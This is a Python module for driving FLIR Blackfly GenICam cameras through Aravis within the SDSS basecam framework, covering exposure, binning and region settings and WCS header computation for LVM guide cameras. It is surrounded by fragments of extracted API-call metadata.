'tempfile.gettempdir', ([], {}), '()\n', (2935, 2937), False, 'import tempfile\n'), ((7517, 7528), 'time.time', 'time.time', ([], {}), '()\n', (7526, 7528), False, 'import time\n'), ((7696, 7707), 'time.time', 'time.time', ([], {}), '()\n', (7705, 7707), False, 'import time\n')]
|
#!/usr/bin/env python3
"""
Python3 class to work with Aravis/GenICam cameras, subclass of sdss-basecam.
.. module:: araviscam
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import sys
import math
import asyncio
import numpy
import astropy
from basecam.mixins import ImageAreaMixIn
from basecam import (
CameraSystem,
BaseCamera,
CameraEvent,
CameraConnectionError,
models,
ExposureError,
)
from lvmcam.actor import modules
# Since the aravis wrapper for GenICam cameras (such as the Blackfly)
# is using glib2 GObjects to represent cameras and streams, the
# PyGObject module allows to call the C functions of aravis in python.
# https://pygobject.readthedocs.io/en/latest/
from lvmcam.araviscam.aravis import Aravis
import basecam.models.card as card
from lvmcam.actor.commands import expose
# https://pypi.org/project/sdss-basecam/
# https://githum.com/sdss/basecam/
# from sdsstools import read_yaml_file
__all__ = ["BlackflyCameraSystem", "BlackflyCamera", "BlackflyImageAreaMixIn"]
class BlackflyCameraSystem(CameraSystem):
"""A collection of GenICam cameras, possibly online
:param camera_class : `.BaseCamera` subclass
The subclass of `.BaseCamera` to use with this camera system.
:param camera_config :
A dictionary with the configuration parameters for the multiple
cameras that can be present in the system, or the path to a YAML file.
Refer to the documentation for details on the accepted format.
:type camera_config : dict or path
:param include : List of camera UIDs that can be connected.
:type include : list
:param exclude : list
List of camera UIDs that will be ignored.
:param logger : ~logging.Logger
The logger instance to use. If `None`, a new logger will be created.
:param log_header : A string to be prefixed to each message logged.
:type log_header : str
:param log_file : The path to which to log.
:type log_file : str
:param verbose : Whether to log to stdout.
:type verbose : bool
:param ip_list: A list of IP-Adresses to be checked/pinged.
:type ip_list: List of strings.
"""
__version__ = "0.0.301"
# A list of ip addresses in the usual "xxx.yyy.zzz.ttt" or "name.subnet.net"
# format that have been added manually/explicitly and may not be found by the
# usual broadcase auto-detection (i.e., possibly on some other global network).
ips_nonlocal = []
def __init__(
self,
camera_class=None,
camera_config=None,
include=None,
exclude=None,
logger=None,
log_header=None,
log_file=None,
verbose=False,
ip_list=None,
):
super().__init__(
camera_class=camera_class,
camera_config=camera_config,
include=include,
exclude=exclude,
logger=logger,
log_header=log_header,
log_file=log_file,
verbose=verbose,
)
# If the ctor is fed with an explicit list of IP addresses, add them to
# the scanner (with delayed inspection in list_available_cameras).
if ip_list is not None:
self.ips_nonlocal.extend(ip_list)
# debuging: print yaml configuration
# print(self._config)
# @modules.timeit
def list_available_cameras(self):
"""Gather serial numbers of online Aravis/Genicam devices.
:return: a list of serial numbers (as strings). This list may be
empty if no cameras are online/switched on.
For cameras explicitly addressed by IP, the serial
numbers have the format sn@ip, with an @ between number and address.
:rtype: list
.. todo:: optionally implement a specific filter for Blackfly's if Basler
cameras should not be listed.
"""
# Start with (pessimistic) initially empty set of online devices
serialNums = []
addrs = []
# Broadcast ethernet/bus for recognized cameras.
# Warning/todo: this gathers also cameras that are not of the Blackfly class,
# and in conjunction with the SDSS may also recognize the Basler cameras..
Aravis.update_device_list()
Ndev = Aravis.get_n_devices()
# print(str(Ndev) + " cameras online")
# get_device_id returns a string of type, SN, MAC etc
for i in range(Ndev):
cam = Aravis.Camera.new(Aravis.get_device_id(i))
uid = cam.get_string("DeviceSerialNumber")
serialNums.append(uid)
addrs.append("")
# Try to ping cameras explicitly proposed with ctor.
for ip in self.ips_nonlocal:
try:
cam = Aravis.Camera.new(ip)
uid = cam.get_string("DeviceSerialNumber")
# If is this was already in the scan: discard, else add
if uid not in serialNums:
serialNums.append(uid)
addrs.append("@" + ip)
except:
# apparently no such camera at this address....
pass
# we zip the two lists to the format 'serialnumber{@ip}'
ids = []
for cam in range(len(serialNums)):
ids.append(serialNums[cam] + addrs[cam])
return ids
from basecam.models.builtin import basic_fz_fits_model
class BlackflyCamera(BaseCamera):
"""A FLIR (formerly Point Grey Research) Blackfly camera.
Given the pixel scale on the benches of LVMi and the assumption
of 9 um pixel sizes of the LVMi cameras, we assume that the
cameras have roughly 1 arsec per pixel, so they are used without binning.
In addition we let the camera flip the standard image orientation of the data
values assuming that values are stored into a FITS interface (where
the first values in the sequential data are the bottom row).
So this is not done in this python code but by the camera.
"""
# fits_model=basic_fz_fits_model
def __init__(
self,
uid,
camera_system,
name=None,
force=False,
image_namer=None,
camera_params={},
):
super().__init__(
uid=uid,
camera_system=camera_system,
name=name,
force=force,
image_namer=image_namer,
camera_params=camera_params,
)
self.header = []
@modules.atimeit
async def _connect_internal(self, **kwargs):
"""Connect to a camera and upload basic binning and ROI parameters.
:param kwargs: recognizes the key uid with integer value, the serial number
If the key uid is absent, tries to attach to the first camera.
This is a subdictionary of 'cameras' in practise.
"""
# print(self.name)
# search for an optional uid key in the arguments
try:
uid = kwargs["uid"]
except:
uid = None
# reverse lookup of the uid in the list of known cameras
cs = BlackflyCameraSystem(BlackflyCamera)
slist = cs.list_available_cameras()
if uid is None:
# uid was not specified: grab the first device that is found
# print("no uid provided, attaching to first camera")
idx = 0
else:
# print("searching " + uid + " in " + str(slist) )
idx = -1
for id in slist:
# remove the optional ip address of the id
slistuid = id.split("@")[0]
if slistuid == uid:
idx = slist.index(id)
# not found
if idx < 0:
raise CameraConnectionError("SN " + uid + " not connected")
cam = None
try:
if "@" in slist[idx]:
# if the camera was not on local network use the address part
cam = Aravis.Camera.new(slist[idx].split("@")[1])
else:
# otherwise the index is the same as the search order...
cam = Aravis.Camera.new(Aravis.get_device_id(idx))
except:
raise CameraConnectionError(" not connected")
# search for an optional gain key in the arguments
# todo: one could interpret gain=0 here as to call set_gain_auto(ARV_AUTO_ON)
try:
gain = kwargs["gain"]
if gain > 0.0:
# todo: it might make sense to squeeze this into the minimum
# and maximum range of the camera's gain if outside that range.
self.device.set_gain_auto(0)
cam.set_gain(gain)
except Exception as ex:
# print("failed to set gain " + str(ex))
pass
# see arvenums.h for the list of pixel formats. This is MONO_16 here, always
cam.set_pixel_format(0x01100007)
# search for an optional x and y binning factor
try:
var = kwargs["binning"]
cam.set_binning(var[0], var[1])
except Exception as ex:
# print("failed to set binning " + str(ex))
# horizontal and vertical binning set to 1
cam.set_binning(1, 1)
# scan the general list of genicam featured values
# of the four native types
for typp, arvLst in kwargs.items():
if arvLst is not None:
if typp == "bool":
for genkey, genval in arvLst.items():
try:
cam.set_boolean(genkey, int(genval))
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
elif typp == "int":
for genkey, genval in arvLst.items():
try:
cam.set_integer(genkey, genval)
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
elif typp == "float":
for genkey, genval in arvLst.items():
try:
cam.set_float(genkey, genval)
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
elif typp == "string":
for genkey, genval in arvLst.items():
try:
cam.set_string(genkey, genval)
except:
# probably a typo in the yaml file... todo: log this
# print("failed for " + str(genkey)+str(genval))
pass
dev = cam.get_device()
# Take full frames by default (maximizing probability of LVM guide camera
# to find guide stars in the field)
roiBounds = [-1, -1]
try:
roiBounds[0] = dev.get_integer_feature_value("WidthMax")
roiBounds[1] = dev.get_integer_feature_value("HeightMax")
# print(" ROI " + str(roiBounds[0]) + " x " + str(roiBounds[1]) )
cam.set_region(0, 0, roiBounds[0], roiBounds[1])
except Exception as ex:
# print("failed to set ROI " + str(ex))
pass
self.device = cam
self.regionBounds = roiBounds
@modules.atimeit
async def _disconnect_internal(self):
"""Close connection to camera."""
self.device = None
# @modules.atimeit
async def _expose_grabFrame(self, exposure):
"""Read a single unbinned full frame.
The class splits the parent class' exposure into this function and
the part which generates the FITS file, because applications in guiders
are usually only interested in the frame's data, and would not
take the detour of generating a FITS file and reading it back from
disk.
:param exposure: On entry, exposure.exptim is the intended exposure time in [sec]
On exit, exposure.data is the numpy array of the 16bit data
arranged in FITS order (i.e., the data of the bottom row appear first...)
:return: The dictionary with the window location and size (x=,y=,width=,height=)
"""
# To avoid being left over by other programs with no change
# to set the exposure time, we switch the auto=0=off first
self.device.set_exposure_time_auto(0)
# Aravis assumes exptime in micro second integers
exptime_ms = int(0.5 + exposure.exptime * 1e6)
self.device.set_exposure_time(exptime_ms)
# timeout (factor 2: assuming there may be two frames in auto mode taken
# internally)
# And 5 seconds margin for any sort of transmission overhead over PoE
tout_ms = int(1.0e6 * (2.0 * exposure.exptime + 5))
self.notify(CameraEvent.EXPOSURE_INTEGRATING)
# the buffer allocated/created within the acquisition()
buf = await self.loop.run_in_executor(None, self.device.acquisition, tout_ms)
if buf is None:
raise ExposureError(
"Exposing for "
+ str(exposure.exptime)
+ " sec failed. Timout "
+ str(tout_ms / 1.0e6)
)
# Decipher which methods this aravis buffer has...
# print(dir(buf))
# reg becomes a x=, y=, width= height= dictionary
# these are in standard X11 coordinates where upper left =(0,0)
reg = buf.get_image_region()
# print('region',reg)
data = buf.get_data()
exposure.data = numpy.ndarray(
buffer=data, dtype=numpy.uint16, shape=(1, reg.height, reg.width)
)
# print("exposure data shape", exposure.data.shape)
return reg
@modules.atimeit
async def _expose_internal(self, exposure):
"""Read a single unbinned full frame and store in a FITS file.
:param exposure: On entry exposure.exptim is the intended exposure time in [sec]
On exit, exposure.data contains the 16bit data of a single frame
:return: There is no return value
"""
# fill exposure.data with the frame's 16bit data
# reg becomes a x=, y=, width= height= dictionary
# these are in standard X11 coordinates where upper left =(0,0)
reg = await self._expose_grabFrame(exposure)
# print('region',reg)
binxy = {}
try:
# becomes a dictionary with dx=... dy=... for the 2 horiz/vert binn fact
binxy = self.device.get_binning()
except Exception as ex:
binxy = None
# append FITS header cards
# For the x/y coordinates transform from X11 to FITS coordinates
# Todo: reports the camera y-flipped reg.y if ReversY=true above??
addHeaders = [
("BinX", binxy.dx, "[ct] Horizontal Bin Factor 1, 2 or 4"),
("BinY", binxy.dy, "[ct] Vertical Bin Factor 1, 2 or 4"),
("Width", reg.width, "[ct] Pixel Columns"),
("Height", reg.height, "[ct] Pixel Rows"),
("RegX", 1 + reg.x, "[ct] Pixel Region Horiz start"),
# The lower left FITS corner is the upper left X11 corner...
(
"RegY",
self.regionBounds[1] - (reg.y + reg.height - 1),
"[ct] Pixel Region Vert start",
),
]
dev = self.device.get_device()
# print(dir(dev))
# print(dir(self))
# print(self.camera_system.get_camera(self.name))
# print(self.camera_system._config[self.name])
try:
gain = dev.get_float_feature_value("Gain")
addHeaders.append(("Gain", gain, "Gain"))
except Exception as ex:
# print("failed to read gain" + str(ex))
pass
imgrev = [False, False]
try:
imgrev[0] = self.device.get_boolean("ReverseX")
addHeaders.append(("ReverseX", imgrev[0] != 0, " Flipped left-right"))
imgrev[1] = self.device.get_boolean("ReverseY")
addHeaders.append(("ReverseY", imgrev[1] != 0, " Flipped up-down"))
# print("reversed" + str(imgrev[0]) + str(imgrev[1]) )
except Exception as ex:
# print("failed to read ReversXY" + str(ex))
pass
# This is an enumeration in the GenICam. See features list of
# `arv-tool-0.8 --address=192.168.70.50 features`
binMod = [-1, -1]
try:
binMod[0] = dev.get_integer_feature_value("BinningHorizontalMode")
if binMod[0] == 0:
addHeaders.append(
("BinModeX", "Averag", "Horiz Bin Mode Sum or Averag")
)
else:
addHeaders.append(("BinModeX", "Sum", "Horiz Bin Mode Sum or Averag"))
binMod[1] = dev.get_integer_feature_value("BinningVerticalMode")
if binMod[1] == 0:
addHeaders.append(("BinModeY", "Averag", "Vert Bin Mode Sum or Averag"))
else:
addHeaders.append(("BinModeY", "Sum", "Vert Bin Mode Sum or Averag"))
except Exception as ex:
# print("failed to read binmode" + str(ex))
pass
tmp = False
try:
tmp = self.device.get_boolean("BlackLevelClampingEnable")
addHeaders.append(
("CAMBLCLM", tmp != 0, "Black Level Clamping en/disabled")
)
# print("BlackLevelClampingEnable" + str(imgrev[0]) + str(imgrev[1]) )
except Exception as ex:
# print("failed to read BlackLevelClampingEnable" + str(ex))
pass
try:
camtyp = self.device.get_model_name()
addHeaders.append(("CAMTYP", camtyp, "Camera model"))
except:
pass
# call _expose_wcs() to gather WCS header keywords
addHeaders.extend(self._expose_wcs(exposure, reg))
# for headr in addHeaders:
# exposure.fits_model[0].header_model.append(models.Card(headr))
self.header = addHeaders
# print(repr(exposure.to_hdu()[0].header))
# unref() is currently usupported in this GObject library.
# Hope that this does not lead to any memory leak....
# buf.unref()
return
# @modules.timeit
def _expose_wcs(self, exposure, reg):
"""Gather information for the WCS FITS keywords
:param exposure: On entry exposure.exptim is the intended exposure time in [sec]
On exit, exposure.data contains the 16bit data of a single frame
:param reg The binning and region information
"""
# the section/dictionary of the yaml file for this camera
yamlconfig = self.camera_system._config[self.name]
wcsHeaders = []
# The distance from the long edge of the FLIR camera to the center
# of the focus (fiber) is 7.144+4.0 mm according to SDSS-V_0110 figure 6
# and 11.14471 according to figure 3-1 of LVMi-0081
# For the *w or *e cameras the pixel row 1 (in FITS) is that far
# away in the y-coordinate and in the middle of the x-coordinate.
# For the *c cameras at the fiber bundle we assume them to be in the beam center.
wcsHeaders.append(("CRPIX1", reg.width / 2, "[px] RA center along axis 1"))
if self.name[-1] == "c":
wcsHeaders.append(
("CRPIX2", reg.height / 2, "[px] DEC center along axis 2")
)
else:
# convert 11.14471 mm to microns and to to pixels
crefy = 11.14471 * 1000.0 / yamlconfig["pixsize"]
wcsHeaders.append(("CRPIX2", -crefy, "[px] DEC center along axis 2"))
return wcsHeaders
class BlackflyImageAreaMixIn(ImageAreaMixIn):
"""Allows to select image region and binning factors"""
async def _get_image_area_internal(self):
pass
async def _set_image_area_internal(self, area=None):
pass
async def _get_binning_internal(self):
pass
async def _set_binning_internal(self, hbin, vbin):
pass
# async def singleFrame(
# exptim,
# name,
# verb=False,
# ip_add=None,
# config="cameras.yaml",
# targ=None,
# kmirr=0.0,
# flen=None,
# ):
# """Expose once and write the image to a FITS file.
# :param exptim: The exposure time in seconds. Non-negative.
# :type exptim: float
# :param verb: Verbosity on or off
# :type verb: boolean
# :param ip_add: list of explicit IP's (like 192.168.70.51 or lvmt.irws2.mpia.de)
# :type ip_add: list of strings
# :param config: Name of the YAML file with the cameras configuration
# :type config: string of the file name
# :param targ: alpha/delta ra/dec of the sidereal target
# :type targ: astropy.coordinates.SkyCoord
# :param kmirr: Kmirr angle in degrees (0 if up, positive with right hand rule along North on bench)
# :type kmirr: float
# :param flen: focal length of telescope/siderostat in mm
# If not provided it will be taken from the configuration file
# :type flen: float
# """
# cs = BlackflyCameraSystem(
# BlackflyCamera, camera_config=config, verbose=verb, ip_list=ip_add
# )
# cam = await cs.add_camera(name=name)
# # print("cameras", cs.cameras)
# # print("config" ,config)
# exp = await cam.expose(exptim, "LAB TEST")
# if targ is not None and kmirr is not None:
# # if there is already a (partial) header information, keep it,
# # otherwise create one ab ovo.
# if exp.wcs is None:
# wcshdr = astropy.io.fits.Header()
# else:
# wcshdr = exp.wcs.to_header()
# key = astropy.io.fits.Card("CUNIT1", "deg", "WCS units along axis 1")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CUNIT2", "deg", "WCS units along axis 2")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CTYPE1", "RA---TAN", "WCS type axis 1")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CTYPE2", "DEC--TAN", "WCS type axis 2")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CRVAL1", targ.ra.deg, "[deg] RA at reference pixel")
# wcshdr.append(key)
# key = astropy.io.fits.Card(
# "CRVAL2", targ.dec.deg, "[deg] DEC at reference pixel"
# )
# wcshdr.append(key)
# # field angle: degrees, then radians
# # direction of NCP on the detectors (where we have already flipped pixels
# # on all detectors so fieldrot=kmirr=0 implies North is up and East is left)
# # With right-handed-rule: zero if N=up (y-axis), 90 deg if N=right (x-axis)
# # so the direction is the vector ( sin(f), cos(f)) before the K-mirror.
# # Action of K-mirror is ( cos(2*m), sin(2*m); sin(2*m), -cos(2*m))
# # and action of prism is (-1 0 ; 0 1), i.e. to flip the horizontal coordinate.
# # todo: get starting value from a siderostat field rotation tracking model
# fieldrot = 0.0
# if name[-1] == "c":
# # without prism, assuming center camera placed horizontally
# if name[:4] == "spec":
# # without K-mirror
# pass
# else:
# # with K-mirror
# # in the configuration the y-axis of the image has been flipped,
# # the combined action of (1, 0; 0, -1) and the K-mirror is (cos(2m), sin(2m); -sin(2m), cos(2m))
# # and applied to the input vector this is (sin(2m+f), cos(2m+f))
# fieldrot += 2.0 * kmirr
# else:
# # with prism
# if name[:4] == "spec":
# # without K-mirror
# # Applied to input beam this gives (-sin(f), cos(f)) but prism effect
# # had been undone by vertical flip in the FLIR image.
# pass
# else:
# # with K-mirror
# # Combined action of K-mirror and prism is (-cos(2*m), -sin(2*m);sin(2*m), -cos(2*m)).
# # Applied to input beam this gives (-sin(2*m+f), -cos(2*m+f)) = (sin(2*m+f+pi), cos(2*m+f+pi)).
# fieldrot += 2.0 * kmirr + 180.0
# if name[-1] == "w":
# # Camera is vertically,
# # so up in the lab is right in the image
# fieldrot += 90
# else:
# # Camera is vertically,
# # so up in the lab is left in the image
# fieldrot -= 90
# fieldrot = math.radians(fieldrot)
# # the section/dictionary of the yaml file for this camera
# yamlconfig = cs._config[name]
# if flen is None:
# flen = yamlconfig["flen"]
# # pixel scale per arcseconds is focal length *pi/180 /3600
# # = flen * mm *pi/180 /3600
# # = flen * um *pi/180 /3.6, so in microns per arcsec...
# pixscal = math.radians(flen) / 3.6
# # degrees per pixel is arcseconds per pixel/3600 = (mu/pix)/(mu/arcsec)/3600
# degperpix = yamlconfig["pixsize"] / pixscal / 3600.0
# # for the right handed coordinates
# # (pixx,pixy) = (cos f', -sin f'; sin f', cos f')*(DEC,RA) where f' =90deg -fieldrot
# # (pixx,pixy) = (sin f, -cos f; cos f , sin f)*(DEC,RA)
# # (sin f, cos f; -cos f, sin f)*(pixx,pixy) = (DEC,RA)
# # (-cos f, sin f; sin f, cos f)*(pixx,pixy) = (RA,DEC)
# # Note that the det of the WCS matrix is negativ (because RA/DEC is left-handed...)
# cosperpix = degperpix * math.cos(fieldrot)
# sinperpix = degperpix * math.sin(fieldrot)
# key = astropy.io.fits.Card("CD1_1", -cosperpix, "[deg/px] WCS matrix diagonal")
# wcshdr.append(key)
# key = astropy.io.fits.Card("CD2_2", cosperpix, "[deg/px] WCS matrix diagonal")
# wcshdr.append(key)
# key = astropy.io.fits.Card(
# "CD1_2", sinperpix, "[deg/px] WCS matrix outer diagonal"
# )
# wcshdr.append(key)
# key = astropy.io.fits.Card(
# "CD2_1", sinperpix, "[deg/px] WCS matrix outer diagonal"
# )
# wcshdr.append(key)
# exp.wcs = astropy.wcs.WCS(wcshdr)
# # print(exp.wcs.to_header_string())
# for headr in wcshdr.cards:
# exp.fits_model[0].header_model.append(models.Card(headr))
# await exp.write()
# if verb:
# print("wrote ", exp.filename)
# # A debugging aid, demonstrator and simple test run
# # This allows to call this file as an executable from the command line.
# # The last command line argument must be the name of the camera
# # as used in the configuration file.
# # Example
# # BlackflyCam.py [-e seconds] [-v] [-c ../etc/cameras.yaml] [-r 2h10m10s] [-d -20d10m3s]
# # [-K kmirrdegrees] [-s "LCO"|"MPIA"|"APO"|"KHU"] [-f focallengthmm] {spec.age|spec.agw|...}
# if __name__ == "__main__":
# import argparse
# parser = argparse.ArgumentParser()
# parser.add_argument(
# "-e",
# "--exptime",
# type=float,
# default=5.0,
# help="Expose for for exptime seconds",
# )
# parser.add_argument(
# "-v", "--verbose", action="store_true", help="print some notes to stdout"
# )
# # With the -i switch we can add an explicit IP-Adress for a
# # camera if we want to read a camera that is not reachable
# # by the broadcast scanner.
# parser.add_argument("-i", "--ip", help="IP address of camera")
# # Name of an optional YAML file
# parser.add_argument(
# "-c", "--cfg", default="cameras.yaml", help="YAML file of lvmt cameras"
# )
# # right ascension in degrees
# parser.add_argument("-r", "--ra", help="RA J2000 in degrees or in xxhxxmxxs format")
# # declination in degrees
# parser.add_argument(
# "-d", "--dec", help="DEC J2000 in degrees or in +-xxdxxmxxs format"
# )
# # K-mirror angle in degrees
# # Note this is only relevant for 3 of the 4 tables/telescopes
# parser.add_argument("-K", "--Kmirr", type=float, help="K-mirror angle in degrees")
# # focal length of telescope in mm
# # Default is the LCO triple lens configuration of 1.8 meters
# parser.add_argument(
# "-f", "--flen", type=float, default=1839.8, help="focal length in mm"
# )
# # shortcut for site coordinates: observatory
# # parser.add_argument("-s", '--site', default="LCO", help="LCO or MPIA or APO or KHU")
# # the last argument is mandatory: must be the name of exactly one camera
# # as used in the configuration file
# parser.add_argument("camname", default="sci.agw")
# args = parser.parse_args()
# ip_cmdLine = []
# if args.ip is not None:
# ip_cmdLine.append(args.ip)
# # check ranges and combine ra/dec into a single SkyCoord
# if args.ra is not None and args.dec is not None:
# if args.ra.find("h") < 0:
# # apparently simple floating point representation
# targ = astropy.coordinates.SkyCoord(
# ra=float(args.ra), dec=float(args.dec), unit="deg"
# )
# else:
# targ = astropy.coordinates.SkyCoord(args.ra + " " + args.dec)
# else:
# targ = None
# # print(targ)
# # The following 2 lines test that listing the connected cameras works...
# # bsys = BlackflyCameraSystem(camera_class=BlackflyCamera)
# # bsys.list_available_cameras()
# asyncio.run(
# singleFrame(
# args.exptime,
# args.camname,
# verb=args.verbose,
# ip_add=ip_cmdLine,
# config=args.cfg,
# targ=targ,
# kmirr=args.Kmirr,
# flen=args.flen,
# )
# )
class WcsHdrCards(card.MacroCard):
def macro(self, exposure, context={}):
wcshdr = get_wcshdr(modules.variables.cs_list[0], modules.variables.camname, modules.variables.targ, modules.variables.kmirr, modules.variables.flen)
return wcshdr
# @modules.timeit
def get_wcshdr(
cs,
name,
targ,
kmirr,
flen,
):
if targ is not None and kmirr is not None:
# wcshdr = astropy.io.fits.Header()
wcshdr = []
key = astropy.io.fits.Card("CUNIT1", "deg", "WCS units along axis 1")
wcshdr.append(key)
key = astropy.io.fits.Card("CUNIT2", "deg", "WCS units along axis 2")
wcshdr.append(key)
key = astropy.io.fits.Card("CTYPE1", "RA---TAN", "WCS type axis 1")
wcshdr.append(key)
key = astropy.io.fits.Card("CTYPE2", "DEC--TAN", "WCS type axis 2")
wcshdr.append(key)
key = astropy.io.fits.Card("CRVAL1", targ.ra.deg, "[deg] RA at reference pixel")
wcshdr.append(key)
key = astropy.io.fits.Card(
"CRVAL2", targ.dec.deg, "[deg] DEC at reference pixel"
)
wcshdr.append(key)
# field angle: degrees, then radians
# direction of NCP on the detectors (where we have already flipped pixels
# on all detectors so fieldrot=kmirr=0 implies North is up and East is left)
# With right-handed-rule: zero if N=up (y-axis), 90 deg if N=right (x-axis)
# so the direction is the vector ( sin(f), cos(f)) before the K-mirror.
# Action of K-mirror is ( cos(2*m), sin(2*m); sin(2*m), -cos(2*m))
# and action of prism is (-1 0 ; 0 1), i.e. to flip the horizontal coordinate.
# todo: get starting value from a siderostat field rotation tracking model
fieldrot = 0.0
if name[-1] == "c":
# without prism, assuming center camera placed horizontally
if name[:4] == "spec":
# without K-mirror
pass
else:
# with K-mirror
# in the configuration the y-axis of the image has been flipped,
# the combined action of (1, 0; 0, -1) and the K-mirror is (cos(2m), sin(2m); -sin(2m), cos(2m))
# and applied to the input vector this is (sin(2m+f), cos(2m+f))
fieldrot += 2.0 * kmirr
else:
# with prism
if name[:4] == "spec":
# without K-mirror
# Applied to input beam this gives (-sin(f), cos(f)) but prism effect
# had been undone by vertical flip in the FLIR image.
pass
else:
# with K-mirror
# Combined action of K-mirror and prism is (-cos(2*m), -sin(2*m);sin(2*m), -cos(2*m)).
# Applied to input beam this gives (-sin(2*m+f), -cos(2*m+f)) = (sin(2*m+f+pi), cos(2*m+f+pi)).
fieldrot += 2.0 * kmirr + 180.0
if name[-1] == "w":
# Camera is vertically,
# so up in the lab is right in the image
fieldrot += 90
else:
# Camera is vertically,
# so up in the lab is left in the image
fieldrot -= 90
fieldrot = math.radians(fieldrot)
# the section/dictionary of the yaml file for this camera
yamlconfig = cs._config[name]
if flen is None:
flen = yamlconfig["flen"]
# pixel scale per arcseconds is focal length *pi/180 /3600
# = flen * mm *pi/180 /3600
# = flen * um *pi/180 /3.6, so in microns per arcsec...
pixscal = math.radians(flen) / 3.6
# degrees per pixel is arcseconds per pixel/3600 = (mu/pix)/(mu/arcsec)/3600
degperpix = yamlconfig["pixsize"] / pixscal / 3600.0
# for the right handed coordinates
# (pixx,pixy) = (cos f', -sin f'; sin f', cos f')*(DEC,RA) where f' =90deg -fieldrot
# (pixx,pixy) = (sin f, -cos f; cos f , sin f)*(DEC,RA)
# (sin f, cos f; -cos f, sin f)*(pixx,pixy) = (DEC,RA)
# (-cos f, sin f; sin f, cos f)*(pixx,pixy) = (RA,DEC)
# Note that the det of the WCS matrix is negativ (because RA/DEC is left-handed...)
cosperpix = degperpix * math.cos(fieldrot)
sinperpix = degperpix * math.sin(fieldrot)
key = astropy.io.fits.Card("CD1_1", -cosperpix, "[deg/px] WCS matrix diagonal")
wcshdr.append(key)
key = astropy.io.fits.Card("CD2_2", cosperpix, "[deg/px] WCS matrix diagonal")
wcshdr.append(key)
key = astropy.io.fits.Card(
"CD1_2", sinperpix, "[deg/px] WCS matrix outer diagonal"
)
wcshdr.append(key)
key = astropy.io.fits.Card(
"CD2_1", sinperpix, "[deg/px] WCS matrix outer diagonal"
)
wcshdr.append(key)
return wcshdr
else:
return None
|
[
"basecam.CameraConnectionError",
"math.radians",
"lvmcam.araviscam.aravis.Aravis.update_device_list",
"lvmcam.araviscam.aravis.Aravis.get_device_id",
"math.sin",
"math.cos",
"lvmcam.araviscam.aravis.Aravis.get_n_devices",
"astropy.io.fits.Card",
"numpy.ndarray",
"lvmcam.araviscam.aravis.Aravis.Camera.new"
] |
[((4241, 4268), 'lvmcam.araviscam.aravis.Aravis.update_device_list', 'Aravis.update_device_list', ([], {}), '()\n', (4266, 4268), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((4284, 4306), 'lvmcam.araviscam.aravis.Aravis.get_n_devices', 'Aravis.get_n_devices', ([], {}), '()\n', (4304, 4306), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((14024, 14109), 'numpy.ndarray', 'numpy.ndarray', ([], {'buffer': 'data', 'dtype': 'numpy.uint16', 'shape': '(1, reg.height, reg.width)'}), '(buffer=data, dtype=numpy.uint16, shape=(1, reg.height, reg.width)\n )\n', (14037, 14109), False, 'import numpy\n'), ((30853, 30916), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CUNIT1"""', '"""deg"""', '"""WCS units along axis 1"""'], {}), "('CUNIT1', 'deg', 'WCS units along axis 1')\n", (30873, 30916), False, 'import astropy\n'), ((30958, 31021), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CUNIT2"""', '"""deg"""', '"""WCS units along axis 2"""'], {}), "('CUNIT2', 'deg', 'WCS units along axis 2')\n", (30978, 31021), False, 'import astropy\n'), ((31063, 31124), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CTYPE1"""', '"""RA---TAN"""', '"""WCS type axis 1"""'], {}), "('CTYPE1', 'RA---TAN', 'WCS type axis 1')\n", (31083, 31124), False, 'import astropy\n'), ((31166, 31227), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CTYPE2"""', '"""DEC--TAN"""', '"""WCS type axis 2"""'], {}), "('CTYPE2', 'DEC--TAN', 'WCS type axis 2')\n", (31186, 31227), False, 'import astropy\n'), ((31269, 31343), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CRVAL1"""', 'targ.ra.deg', '"""[deg] RA at reference pixel"""'], {}), "('CRVAL1', targ.ra.deg, '[deg] RA at reference pixel')\n", (31289, 31343), False, 'import astropy\n'), ((31385, 31461), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CRVAL2"""', 'targ.dec.deg', '"""[deg] DEC at reference pixel"""'], {}), "('CRVAL2', targ.dec.deg, '[deg] DEC at reference pixel')\n", (31405, 31461), False, 'import astropy\n'), ((33639, 33661), 'math.radians', 'math.radians', (['fieldrot'], {}), '(fieldrot)\n', (33651, 33661), False, 'import math\n'), ((34724, 34797), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD1_1"""', '(-cosperpix)', '"""[deg/px] WCS matrix diagonal"""'], {}), "('CD1_1', -cosperpix, '[deg/px] WCS matrix diagonal')\n", (34744, 34797), False, 'import astropy\n'), ((34839, 34911), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD2_2"""', 'cosperpix', '"""[deg/px] WCS matrix diagonal"""'], {}), "('CD2_2', cosperpix, '[deg/px] WCS matrix diagonal')\n", (34859, 34911), False, 'import astropy\n'), ((34953, 35031), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD1_2"""', 'sinperpix', '"""[deg/px] WCS matrix outer diagonal"""'], {}), "('CD1_2', sinperpix, '[deg/px] WCS matrix outer diagonal')\n", (34973, 35031), False, 'import astropy\n'), ((35095, 35173), 'astropy.io.fits.Card', 'astropy.io.fits.Card', (['"""CD2_1"""', 'sinperpix', '"""[deg/px] WCS matrix outer diagonal"""'], {}), "('CD2_1', sinperpix, '[deg/px] WCS matrix outer diagonal')\n", (35115, 35173), False, 'import astropy\n'), ((34017, 34035), 'math.radians', 'math.radians', (['flen'], {}), '(flen)\n', (34029, 34035), False, 'import math\n'), ((34640, 34658), 'math.cos', 'math.cos', (['fieldrot'], {}), '(fieldrot)\n', (34648, 34658), False, 'import math\n'), ((34691, 34709), 'math.sin', 'math.sin', (['fieldrot'], {}), '(fieldrot)\n', (34699, 34709), False, 'import math\n'), ((4483, 4506), 